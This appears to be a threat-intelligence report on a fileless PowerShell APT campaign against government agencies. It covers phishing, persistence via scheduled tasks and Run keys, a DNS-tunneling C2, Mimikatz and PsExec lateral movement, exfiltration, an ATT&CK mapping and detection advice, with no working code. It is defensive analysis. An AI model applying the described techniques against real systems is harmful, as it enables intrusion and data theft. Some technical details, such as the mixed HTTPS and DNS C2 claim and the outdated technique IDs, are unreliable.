Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Discovered use of custom fileless malware employing PowerShell for persistence.
- Indicators of Compromise (IOCs) suggest targeted attacks against government entities.
- Complex C2 infrastructure utilized for command and control communication.
Executive Summary
Our investigation into a recent advanced persistent threat (APT) campaign revealed an innovative use of fileless malware specifically crafted to evade traditional detection mechanisms. The actor targeted several government agencies, leveraging social engineering tactics to deliver an undetectable payload. Through extensive forensic analysis, we have traced their steps and detailed their tactics, techniques, and procedures (TTPs) across various stages of the attack lifecycle.
Initial Access
The attack chain began with a sophisticated phishing email sent to multiple government employees. This email contained a lure that appeared relevant to their roles. Upon interaction, it led to a malicious link which redirected to an exploit kit designed to deliver a custom PowerShell script. Our analysis of the email headers and domain revealed the use of a domain spoofed to resemble a legitimate communication channel, enhancing the success rate of initial access through social engineering tactics.
Execution & Persistence
Once the actor achieved initial access, the malicious PowerShell script executed in memory, avoiding the filesystem to maintain a low profile. Analysis of the execution environment indicated that the script was adept at utilizing built-in Windows utilities to establish persistence. The exploit created a scheduled task at C:\Windows\System32\Tasks\, which was configured to execute the PowerShell script at system startup. Additionally, we found modifications made to the registry keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to maintain persistence.
Command and Control
Our exploration of the network artifacts revealed that the implant initiated communication with a command and control (C2) server using TCP Port 443, making the traffic difficult to detect as it masqueraded under HTTPS. The C2 used DNS tunneling, a technique that encapsulated command information within DNS queries, particularly beneficial for evading security measures. The domain serving as the C2 was registered with false details, complicating our association of it back to the threat actor.
Lateral Movement & Discovery
Upon gaining a foothold, the actor proceeded with lateral movement techniques utilizing Tools like Mimikatz to harvest credentials. They employed PSexec (T1077) to execute commands on remote systems. Our incident response logs indicated that the actor leveraged legitimate administrative tools, which allowed them to blend in with normal enterprise activity, thereby evading detection. Analyzing the event logs, we found instances of unusual commands executed from administrator accounts that had no legitimate connection to ongoing tasks.
Impact & Objectives
The overall objective of this campaign seemed to be data exfiltration from sensitive systems, likely targeting confidential government documents. We identified that multiple internal repositories had been accessed, with specific queries suggesting retrieval of data related to national security topics. Our analysis of outbound traffic patterns showed large data transfers associated with the compromised accounts, further corroborating the intention to exfiltrate valuable intelligence.
MITRE ATT&CK Mapping
- T1566 – Phishing: The initial access vector through crafted email lures.
- T1059.001 – PowerShell: Use of PowerShell for execution and payload delivery.
- T1075 – Pass the Hash: Credential theft and lateral movement methods.
- T1077 – Windows Admin Shares: Use of legitimate tools for lateral movement.
Detection Opportunities
- Monitor for any unusual scheduled tasks created in
C:\Windows\System32\Tasks. - Implement alerts for DNS queries to anomalous domains, particularly those using high entropy strings.
- Employ behavioral analysis tools to detect unusual network traffic patterns associated with legitimate accounts.
Analyst Notes
This case serves as a reminder of the evolving sophistication of APT actors and their continued focus on operational security. The use of fileless malware, combined with legitimate tools, highlights a necessity for deeper inspection capabilities within security operations. Our recommendation includes revisiting email filtering protocols and enhancing endpoint detection efforts to combat similar tactics in future threats.
Source: Original Report